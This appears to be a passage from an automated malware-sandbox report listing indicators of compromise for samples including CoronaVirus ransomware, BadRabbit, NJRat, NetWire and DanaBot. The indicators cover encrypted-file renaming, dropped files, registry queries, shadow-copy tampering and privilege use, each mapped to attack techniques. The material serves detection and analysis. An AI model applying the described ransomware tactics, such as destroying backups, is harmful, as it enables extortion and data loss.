File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioProCO365R_SubTest-ul-oob.xrm-ms	CoronaVirus.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\codec\libx265_plugin.dll.id-015EE178.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteNewNoteMedTile.scale-100.png	CoronaVirus.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_reminders_18.svg	CoronaVirus.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\MSIPC\msipc.dll.id-015EE178.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\keystore\libfile_keystore_plugin.dll.id-015EE178.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_newfolder-default.svg.id-015EE178.[[email protected]].ncov	CoronaVirus.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\duplicate.svg.id-015EE178.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\VBA\VBA7.1\VBEUIRES.DLL.id-015EE178.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_neutral_split.scale-100_kzf8qxf38zg5c\AppxSignature.p7x	CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Wallet_2.4.18324.0_neutral_~_8wekyb3d8bbwe\AppxSignature.p7x	CoronaVirus.exe
File created	C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogo.contrast-white_scale-100.png.id-015EE178.[[email protected]].ncov	CoronaVirus.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\tr-tr\ui-strings.js.id-015EE178.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Functions\Assertions\MatchExactly.ps1	CoronaVirus.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\Library\EUROTOOL.XLAM.id-015EE178.[[email protected]].ncov	CoronaVirus.exe
File created	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\System.Drawing.dll.id-015EE178.[[email protected]].ncov	CoronaVirus.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\da-dk\ui-strings.js.id-015EE178.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\PresentationFramework.Aero.dll	CoronaVirus.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\ExcelMessageDismissal.txt.id-015EE178.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\OneNotePageMedTile.scale-400.png	CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\Icons\jit_rich_capture.png	CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.contrast-black_targetsize-20.png	CoronaVirus.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_nextarrow_default.svg.id-015EE178.[[email protected]].ncov	CoronaVirus.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\O365EduCloudEDUR_Subscription-ppd.xrm-ms.id-015EE178.[[email protected]].ncov	CoronaVirus.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_Subscription3-ppd.xrm-ms.id-015EE178.[[email protected]].ncov	CoronaVirus.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\HomeStudentVNextR_Retail-ppd.xrm-ms.id-015EE178.[[email protected]].ncov	CoronaVirus.exe
File created	C:\Program Files\7-Zip\Lang\ug.txt.id-015EE178.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\Microsoft Office\root\fre\StartMenu_Win7_RTL.wmv.id-015EE178.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN111.XML	CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\WideTile.scale-125.png	CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\StoreLogo.scale-200.png	CoronaVirus.exe

Drops file in Windows directory 11 IoCs

Processes:

rundll32.exerundll32.exeBadRabbit.exerundll32.exeBadRabbit.exeBadRabbit.exeBadRabbit.exerundll32.exe

description	ioc	process
File opened for modification	C:\Windows\infpub.dat	rundll32.exe
File opened for modification	C:\Windows\infpub.dat	rundll32.exe
File created	C:\Windows\infpub.dat	BadRabbit.exe
File opened for modification	C:\Windows\infpub.dat	rundll32.exe
File created	C:\Windows\infpub.dat	BadRabbit.exe
File created	C:\Windows\infpub.dat	BadRabbit.exe
File created	C:\Windows\cscc.dat	rundll32.exe
File created	C:\Windows\dispci.exe	rundll32.exe
File created	C:\Windows\infpub.dat	BadRabbit.exe
File opened for modification	C:\Windows\4479.tmp	rundll32.exe
File opened for modification	C:\Windows\infpub.dat	rundll32.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

Processes:

netsh.exe

description	ioc	process
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

Program crash 2 IoCs

Processes:

WerFault.exeWerFault.exe

pid pid_target process target process

2240 6056 WerFault.exe DanaBot.exe
5408 4380 WerFault.exe NetWire.exe

pid	pid_target	process	target process
2240	6056	WerFault.exe	DanaBot.exe
5408	4380	WerFault.exe	NetWire.exe

System Location Discovery: System Language Discovery 1 TTPs 35 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

cmd.exeBadRabbit.exerundll32.exeNJRat.exeNetWire.exeNetWire.exereg.exeschtasks.exenetsh.exeNetWire.execmd.exeBadRabbit.exerundll32.exeregsvr32.exeCoronaVirus.exeCoronaVirus.exeBadRabbit.exe$uckyLocker.exerundll32.exeNJRat.exeNetWire.exereg.exeBadRabbit.exeDeriaLock.exeDanaBot.exeNJRat.exeNotepad.exeDeriaLock.exerundll32.exe$uckyLocker.exeNJRat.exeNJRat.exeNJRat.exereg.exerundll32.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BadRabbit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NJRat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NetWire.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NetWire.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NetWire.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BadRabbit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regsvr32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CoronaVirus.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CoronaVirus.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BadRabbit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	$uckyLocker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NJRat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NetWire.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BadRabbit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DeriaLock.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DanaBot.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NJRat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Notepad.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DeriaLock.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	$uckyLocker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NJRat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NJRat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NJRat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Interacts with shadow copies 3 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

Direct Volume Access
T1006

Processes:

vssadmin.exevssadmin.exe

pid process

27860 vssadmin.exe
39164 vssadmin.exe

pid	process
27860	vssadmin.exe
39164	vssadmin.exe

Modifies registry class 2 IoCs

Processes:

msedge.exemsedge.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1194130065-3471212556-1656947724-1000\{8AD672B1-5206-45E0-BF8A-B9F6EE054164}	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings	msedge.exe

Modifies registry key 1 TTPs 3 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exereg.exe

pid process

8464 reg.exe
8588 reg.exe
8080 reg.exe

pid	process
8464	reg.exe
8588	reg.exe
8080	reg.exe

NTFS ADS 7 IoCs

Processes:

msedge.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 895779.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 834974.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 731226.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 21252.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 807316.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 463846.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 263777.crdownload:SmartScreen	msedge.exe

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	179	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	181	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

msedge.exemsedge.exeidentity_helper.exemsedge.exemsedge.exemsedge.exemsedge.exeNJRat.exeNJRat.exe

pid	process
3396	msedge.exe
3396	msedge.exe
1020	msedge.exe
1020	msedge.exe
3856	identity_helper.exe
3856	identity_helper.exe
5776	msedge.exe
5776	msedge.exe
3860	msedge.exe
3860	msedge.exe
5892	msedge.exe
5892	msedge.exe
4600	msedge.exe
4600	msedge.exe
4600	msedge.exe
4600	msedge.exe
2544	NJRat.exe
4848	NJRat.exe
2544	NJRat.exe
4848	NJRat.exe
2544	NJRat.exe
2544	NJRat.exe
4848	NJRat.exe
4848	NJRat.exe
2544	NJRat.exe
2544	NJRat.exe
2544	NJRat.exe
2544	NJRat.exe
2544	NJRat.exe
2544	NJRat.exe
2544	NJRat.exe
2544	NJRat.exe
2544	NJRat.exe
2544	NJRat.exe
2544	NJRat.exe
2544	NJRat.exe
2544	NJRat.exe
2544	NJRat.exe
4848	NJRat.exe
4848	NJRat.exe
4848	NJRat.exe
4848	NJRat.exe
4848	NJRat.exe
4848	NJRat.exe
4848	NJRat.exe
4848	NJRat.exe
4848	NJRat.exe
4848	NJRat.exe
4848	NJRat.exe
4848	NJRat.exe
4848	NJRat.exe
4848	NJRat.exe
4848	NJRat.exe
4848	NJRat.exe
4848	NJRat.exe
4848	NJRat.exe
2544	NJRat.exe
2544	NJRat.exe
2544	NJRat.exe
2544	NJRat.exe
4848	NJRat.exe
4848	NJRat.exe
4848	NJRat.exe
4848	NJRat.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 21 IoCs

Processes:

msedge.exe

pid	process
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

NJRat.exeNJRat.exeNJRat.exeNJRat.exeNJRat.exeNJRat.exevssvc.exeDeriaLock.exeDeriaLock.exe

description	pid	process
Token: SeDebugPrivilege	2544	NJRat.exe
Token: SeDebugPrivilege	4848	NJRat.exe
Token: SeDebugPrivilege	6060	NJRat.exe
Token: SeDebugPrivilege	5276	NJRat.exe
Token: SeDebugPrivilege	2192	NJRat.exe
Token: 33	4848	NJRat.exe
Token: SeIncBasePriorityPrivilege	4848	NJRat.exe
Token: SeDebugPrivilege	5376	NJRat.exe
Token: 33	4848	NJRat.exe
Token: SeIncBasePriorityPrivilege	4848	NJRat.exe
Token: 33	4848	NJRat.exe
Token: SeIncBasePriorityPrivilege	4848	NJRat.exe
Token: 33	4848	NJRat.exe
Token: SeIncBasePriorityPrivilege	4848	NJRat.exe
Token: 33	4848	NJRat.exe
Token: SeIncBasePriorityPrivilege	4848	NJRat.exe
Token: 33	4848	NJRat.exe
Token: SeIncBasePriorityPrivilege	4848	NJRat.exe
Token: 33	4848	NJRat.exe
Token: SeIncBasePriorityPrivilege	4848	NJRat.exe
Token: 33	4848	NJRat.exe
Token: SeIncBasePriorityPrivilege	4848	NJRat.exe
Token: 33	4848	NJRat.exe
Token: SeIncBasePriorityPrivilege	4848	NJRat.exe
Token: 33	4848	NJRat.exe
Token: SeIncBasePriorityPrivilege	4848	NJRat.exe
Token: SeBackupPrivilege	39988	vssvc.exe
Token: SeRestorePrivilege	39988	vssvc.exe
Token: SeAuditPrivilege	39988	vssvc.exe
Token: 33	4848	NJRat.exe
Token: SeIncBasePriorityPrivilege	4848	NJRat.exe
Token: 33	4848	NJRat.exe
Token: SeIncBasePriorityPrivilege	4848	NJRat.exe
Token: 33	4848	NJRat.exe
Token: SeIncBasePriorityPrivilege	4848	NJRat.exe
Token: 33	4848	NJRat.exe
Token: SeIncBasePriorityPrivilege	4848	NJRat.exe
Token: 33	4848	NJRat.exe
Token: SeIncBasePriorityPrivilege	4848	NJRat.exe
Token: 33	4848	NJRat.exe
Token: SeIncBasePriorityPrivilege	4848	NJRat.exe
Token: 33	4848	NJRat.exe
Token: SeIncBasePriorityPrivilege	4848	NJRat.exe
Token: 33	4848	NJRat.exe
Token: SeIncBasePriorityPrivilege	4848	NJRat.exe
Token: 33	4848	NJRat.exe
Token: SeIncBasePriorityPrivilege	4848	NJRat.exe
Token: 33	4848	NJRat.exe
Token: SeIncBasePriorityPrivilege	4848	NJRat.exe
Token: 33	4848	NJRat.exe
Token: SeIncBasePriorityPrivilege	4848	NJRat.exe
Token: 33	4848	NJRat.exe
Token: SeIncBasePriorityPrivilege	4848	NJRat.exe
Token: 33	4848	NJRat.exe
Token: SeIncBasePriorityPrivilege	4848	NJRat.exe
Token: SeDebugPrivilege	36620	DeriaLock.exe
Token: SeDebugPrivilege	36524	DeriaLock.exe
Token: 33	4848	NJRat.exe
Token: SeIncBasePriorityPrivilege	4848	NJRat.exe
Token: 33	4848	NJRat.exe
Token: SeIncBasePriorityPrivilege	4848	NJRat.exe
Token: 33	4848	NJRat.exe
Token: SeIncBasePriorityPrivilege	4848	NJRat.exe
Token: 33	4848	NJRat.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

msedge.exe

pid	process
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe

Suspicious use of SendNotifyMessage 32 IoCs

Processes:

msedge.exe

pid	process
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe
1020	msedge.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

dl2.exedl2.exe

pid process

4400 dl2.exe
2576 dl2.exe

pid	process
4400	dl2.exe
2576	dl2.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

msedge.exe

description	pid	process	target process
PID 1020 wrote to memory of 648	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 648	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 1244	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 1244	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 1244	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 1244	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 1244	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 1244	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 1244	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 1244	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 1244	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 1244	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 1244	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 1244	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 1244	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 1244	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 1244	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 1244	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 1244	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 1244	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 1244	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 1244	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 1244	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 1244	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 1244	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 1244	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 1244	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 1244	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 1244	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 1244	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 1244	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 1244	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 1244	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 1244	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 1244	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 1244	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 1244	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 1244	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 1244	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 1244	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 1244	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 1244	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 3396	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 3396	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 1444	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 1444	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 1444	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 1444	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 1444	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 1444	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 1444	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 1444	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 1444	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 1444	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 1444	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 1444	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 1444	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 1444	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 1444	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 1444	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 1444	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 1444	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 1444	1020	msedge.exe	msedge.exe
PID 1020 wrote to memory of 1444	1020	msedge.exe	msedge.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\dl2.exe
"C:\Users\Admin\AppData\Local\Temp\dl2.exe"
1⤵
- Suspicious use of SetWindowsHookEx
PID:4400

C:\Users\Admin\AppData\Local\Temp\dl2.exe
C:\Users\Admin\AppData\Local\Temp\dl2.exe {87911C0D-E644-4A0D-9804-AC9ACAB7CF2E}
1⤵
- Suspicious use of SetWindowsHookEx
PID:2576

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- BazarBackdoor
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1020

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffa3a1e46f8,0x7ffa3a1e4708,0x7ffa3a1e4718
2⤵
PID:648

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,9596099583403137565,15962314581287290760,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2156 /prefetch:2
2⤵
PID:1244

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2092,9596099583403137565,15962314581287290760,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 /prefetch:3
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3396

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2092,9596099583403137565,15962314581287290760,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2812 /prefetch:8
2⤵
PID:1444

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9596099583403137565,15962314581287290760,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3424 /prefetch:1
2⤵
PID:516

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
